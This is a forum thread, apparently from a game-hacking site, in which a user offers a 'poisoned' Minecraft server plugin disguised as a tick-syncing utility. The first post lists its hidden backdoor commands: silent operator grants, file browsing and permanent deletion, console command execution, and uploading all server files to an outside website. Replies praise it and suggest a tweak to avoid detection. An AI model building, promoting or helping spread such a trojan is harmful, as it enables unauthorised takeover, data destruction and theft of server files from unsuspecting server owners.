Results 1 to 8 of 8
  1. #1
    FlawTECH's Avatar
    Join Date
    Jan 2017
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    10
    My Mood
    Lurking

    [1.9.X - 1.11.X] [Poison] TickSyncer

    Hey everyone, I wrote some poisoned plugin for me and some friends and thought I could share it here.
    It's a small yet powerful plugin which lets you manipulate the files where the server is stored.

    Seems like I can't post pictures, will update when I have enough posts I guess

    FEATURES

    • /ticksyncer
      Displays a fake message stating that the plugin is running fine
    • +help
      Shows a list of available commands
      USAGE : +help
      IMGUR : /gLaq8zc
    • +op
      Gives you administrator rights silently
      USAGE : +op
      IMGUR : /FysEVkr | /itp7h6w
    • +opall
      Gives administrator rights to everyone you included. Also deops all previously opped players
      USAGE : +opall
      IMGUR : /L0fKOqS
    • +ls
      Shows the content of a directory. The default path is the server's location on its hard drive
      USAGE : +ls
      IMGUR : /fofskMc
    • +nav
      Allows you to select a directory / file to view its list of files or to delete them
      USAGE : +nav <file.ext | directory | ./ | ../>
      IMGUR : /hUt84U4 | /p9cnxaa
    • +del
      Deletes the folders and files contained in the folder / file selected from the +nav command. The changes made are permanent
      USAGE : +del
      IMGUR : /3RZwwlX | /vRtxRRI
    • +exec
      Allows you to perform console commands. Be careful, this command uses the console sender so everything is logged onto the console
      USAGE : +exec <command>
      IMGUR : /VcBFRYk
    • +zip
      Puts all the server's files into a compressed archive and uploads them to a website. You are then given the link to view the files (this process usually
      takes a while)
      USAGE : +zip
      IMGUR : /PgFK12o


    Note that it's the first plugin I ever finish completely so it may contain bugs and the code can be badly optimized, but it shouldn't affect the server's performance. Feel free to tell me if you want any features added/changed or if there are any bugs.

    Enjoy !

    VirusTotal : www[dot]virustotal[dot]com/en/file/8cbfb53bda31fdcd4150f7e00efc7eae95fe13d42d51782a5f b41ec986158458/analysis/1483738985/
    Jotti : virusscan[dot]jotti[dot]org/en-US/filescanjob/t61iohdhu3
    <b>Downloadable Files</b> Downloadable Files

  2. The Following 10 Users Say Thank You to FlawTECH For This Useful Post:

    auvogadro (10-01-2017),DreadStone (09-03-2017),HiImKyle (12-06-2017),OtavioPIza (05-27-2017),Rara55 (05-20-2017),Rob (01-20-2017),sosiska222 (12-18-2018),Stefano1709 (01-13-2017),THEJBD (11-26-2019),VIGIL33T (01-30-2018)

  3. #2
    Hugo Boss's Avatar
    Join Date
    Oct 2011
    Gender
    male
    Posts
    28,752
    Reputation
    4790
    Thanks
    5,902
    My Mood
    Angelic
    //Approved, file appears safe, but has not been tested.

    Use at your own risk.

     
    Super User since 08-29-2017
    Global Moderator from 10-02-2016 - 08-29-2017
    Premium Seller since 11-16-2016
    Moderator from 09-24-2015 - 01-09-2016
    Alliance of Valiant Arms Minion from 11-12-2015 - 01-09-2016
    Market place Minion from 09-24-2015 - 01-09-2016
    Crossfire Minion from 09-11-2015 - 01-09-2016

    Middleman from 07-07-2015 - 01-09-2016
    Market Place Minion from 03-03-2014 - 08-01-2014
    Middleman from 01-30-2014 - 08-01-2014
    Moderator from 03-29-2013 - 04-04-2013
    Market Place Minion from 03-07-2013 - 04-04-2013
    Premium Member since 01-25-2013
    Middleman from 12-04-2012 - 04-04-2013
    Registered since 10-9-2011

  4. #3
    Stefano1709's Avatar
    Join Date
    Jan 2017
    Gender
    male
    Posts
    47
    Reputation
    10
    Thanks
    1
    My Mood
    Lurking
    Downloaded, tested and it worked! Code is not the best but nice work as your first plugin.

  5. #4
    FlawTECH's Avatar
    Join Date
    Jan 2017
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    10
    My Mood
    Lurking
    Quote Originally Posted by Stefano1709 View Post
    Downloaded, tested and it worked! Code is not the best but nice work as your first plugin.
    Hey, thanks ! Yeah I know it's not the best, I can't figure out how to optimize my code when using the Spigot API, any idea on how I can optimize this plugin ?

  6. #5
    HiImKyle's Avatar
    Join Date
    Oct 2015
    Gender
    male
    Location
    England
    Posts
    233
    Reputation
    10
    Thanks
    206
    Always liked making poisoned plugins, this one may not be as powerful as some of my own but i like it its nice, well done

    EDIT:

    You might want to consider catching the message even if its not a command but starts with a + otherwise if someone gets it wrong they might get caught.

    if it starts with "+"
    check the whole message through the commands you have, if its not a command, still cancel it
    else
    message gets sent as a normal message
    end
    Last edited by HiImKyle; 01-18-2017 at 09:52 AM. Reason: Giving a suggestion

  7. #6
    FlawTECH's Avatar
    Join Date
    Jan 2017
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    10
    My Mood
    Lurking
    Quote Originally Posted by Sup3rNinj4z View Post
    Always liked making poisoned plugins, this one may not be as powerful as some of my own but i like it its nice, well done

    EDIT:

    You might want to consider catching the message even if its not a command but starts with a + otherwise if someone gets it wrong they might get caught.

    if it starts with "+"
    check the whole message through the commands you have, if its not a command, still cancel it
    else
    message gets sent as a normal message
    end
    Hey! Thanks for the feedback, I'll add this in the next version

  8. #7
    Rob's Avatar
    Join Date
    Nov 2016
    Gender
    male
    Location
    Wherever the wind of life decides to takes me, for instance, my parent's basement right now.
    Posts
    3,155
    Reputation
    326
    Thanks
    1,363
    My Mood
    Amazed
    Damn, that zip command is rad!

  9. #8
    Austen_Dayton's Avatar
    Join Date
    Mar 2018
    Gender
    female
    Location
    DUBAI
    Posts
    303
    Reputation
    10
    Thanks
    18
    Tested and works fine!

Similar Threads

  1. Banned due to Poison Ivy?
    By asde531 in forum Combat Arms Help
    Replies: 12
    Last Post: 03-12-2010, 01:21 AM
  2. Whats your poison?
    By PyrexxHero® in forum General
    Replies: 30
    Last Post: 01-05-2010, 02:31 PM
  3. [AWESOME]-[Poisoned]
    By Dim in forum CrossFire Mods & Rez Modding
    Replies: 27
    Last Post: 01-05-2010, 10:44 AM
  4. [TUT] Poison Ivy [RAT/VIRUS]
    By aleksi1309 in forum General Hacking
    Replies: 1
    Last Post: 12-02-2009, 02:51 PM
  5. What's yer poison?
    By dynehima in forum Combat Arms Hacks & Cheats
    Replies: 12
    Last Post: 08-19-2009, 07:21 PM